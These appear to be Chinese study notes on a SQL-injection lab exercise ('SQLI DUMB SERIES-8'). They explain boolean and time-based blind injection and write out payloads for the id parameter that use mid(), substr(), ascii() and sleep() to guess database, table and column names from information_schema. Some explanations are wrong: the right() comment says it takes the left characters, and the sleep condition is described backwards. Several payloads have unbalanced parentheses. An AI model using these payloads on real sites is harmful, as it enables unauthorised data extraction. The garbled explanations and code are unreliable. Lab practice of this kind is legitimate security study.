SQLI DUMB SERIES-8思路
?id=1'--+
构造闭合发现没有回显
则我们使用盲注
盲注分为几种
布尔型盲注
Length() //返回字符串长度
Substr() //取字符串 用法同下
mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB
left() //left(ABC,2)取字符串左边的几位 返回值为AB
right() //right(ABC,2)取字符串左边的几位 返回值为BC
ord()/ascii() //返回一个字符的ASCII码/返回一个数字对应ASCII码的字符
hex() //返回16进制数 hex编码
?id=1’ and mid(database(),1,8)=‘security’--+
时间型盲注
sleep(1) //睡1秒
交互时睡1秒
不交互时不延迟
if()函数 //判断后,true返回3,false返回4
if(1=1,3,4) 返回3
if(1=2,3,4) 返回4
?id=1’ and if(1=2,1,sleep(5))—+ //判断闭合
如果1=2正确 则睡眠5S 将1=2替换成SQL语句后可盲注
id=1’ and if((length(database()>1),sleep(4),0)--+ //增加1值来猜库名的长度
id 1’ and if((ascii(substr(database(),1,1)))>1),sleep(4),0)--+ //库名
id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = ‘your table’ and table_schema = 'your database’limit 0,1),1,1))>1),sleep(4),0)--+ //表名
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
通过改变盲注的ascii码来猜库名